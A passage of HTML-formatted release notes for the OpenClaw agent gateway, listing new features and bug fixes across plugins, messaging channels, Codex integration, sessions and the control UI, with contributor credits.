<li>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</li>
<li>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</li>
<li>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</li>
<li>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</li>
<li>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</li>
<li>Slack: publish a safe default App Home tab view on <code>app_home_opened</code>, include the Home tab event in setup manifests, and keep track of bot-participated threads across restarts so ongoing threaded conversations can continue auto-replying after the Gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness; default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</li>
<li>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</li>
<li>Gateway/CLI/status: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting; add concrete service, config, listener-owner, and log collection next steps when gateway probes fail and Bonjour finds no local gateway; avoid repeated plugin tool descriptor config hashing so large runtime configs do not block reply startup and trigger reconnect/timeouts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088411746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49012/hovercard" href="https://github.com/openclaw/openclaw/issues/49012">#49012</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367851232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75944/hovercard" href="https://github.com/openclaw/openclaw/issues/75944">#75944</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Plugins/update/config: stop treating the non-plugin <code>auth</code> command root as a bundled plugin id, keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, detect tracked plugin install records whose package directories disappeared during <code>openclaw update</code>, reinstall them before normal plugin updates, fail the update if install records still point at missing disk payloads, and validate configured web-search providers plus statically suppressed model/provider pairs against the active plugin set at config load. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</li>
<li>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Status/update: resolve beta update-channel checks from the installed version when config still says <code>stable</code>, show configured channels in <code>openclaw status</code> and config-only <code>openclaw channels status</code> output even when the Gateway is unreachable, and let <code>status --deep</code> reuse live gateway channel credential state instead of warning on command-path-only token misses. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/externalization: add official npm-first catalogs for externalized channel, provider, and generic plugins; install official external web-search plugins before saving provider config; repair missing configured, selected-search, and env-selected plugin installs from npm by default; keep official install docs, update examples, live Codex checks, diagnostics ClawHub packages, and persisted bundled-plugin relocation on default npm tags; and keep ACPX, Google Chat, and LINE publishable plugin dist trees out of the core package while ClawHub pack files roll out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/ClawHub/source/registry: use the ClawHub artifact resolver response as the install decision before downloading, keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed, discover source-only plugins such as Codex from <code>extensions/*</code>, install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path, persist artifact kind, npm integrity, shasum, and tarball metadata for update/diagnostics flows, fall back to version metadata when the artifact resolver route is missing, keep the Docker ClawHub fixture aligned with npm-pack artifact resolution, explain unavailable explicit ClawHub ClawPack artifact downloads with a temporary npm install hint, and hash manifest/package metadata when validating persisted plugin registries so fast same-size rewrites cannot leave stale plugin metadata trusted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI: add validated <code>gateway.controlUi.chatMessageMaxWidth</code> instead of patched bundled CSS, ignore malformed persisted cron rows before they enter UI state, guard stale cron render paths, and bound the default Sessions tab query to recent activity and fewer rows while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</li>
<li>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</li>
<li>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</li>
<li>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings, keep Stop available after reconnect or reload by recovering session-scoped active-run abort state, contain standalone iOS PWA viewports with safe-area-aware document locking, use high-contrast text selection colors, and show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</li>
<li>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</li>
<li>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</li>
<li>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, update stale configured plugin manifests that still declare channels without <code>channelConfigs</code>, install actively used downloadable OpenClaw plugins through the configured external source, preserve unmanaged third-party plugin <code>node_modules</code>, and then mark the config touched for the release.</li>
<li>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</li>
<li>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</li>
<li>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</li>
<li>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</li>
<li>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</li>
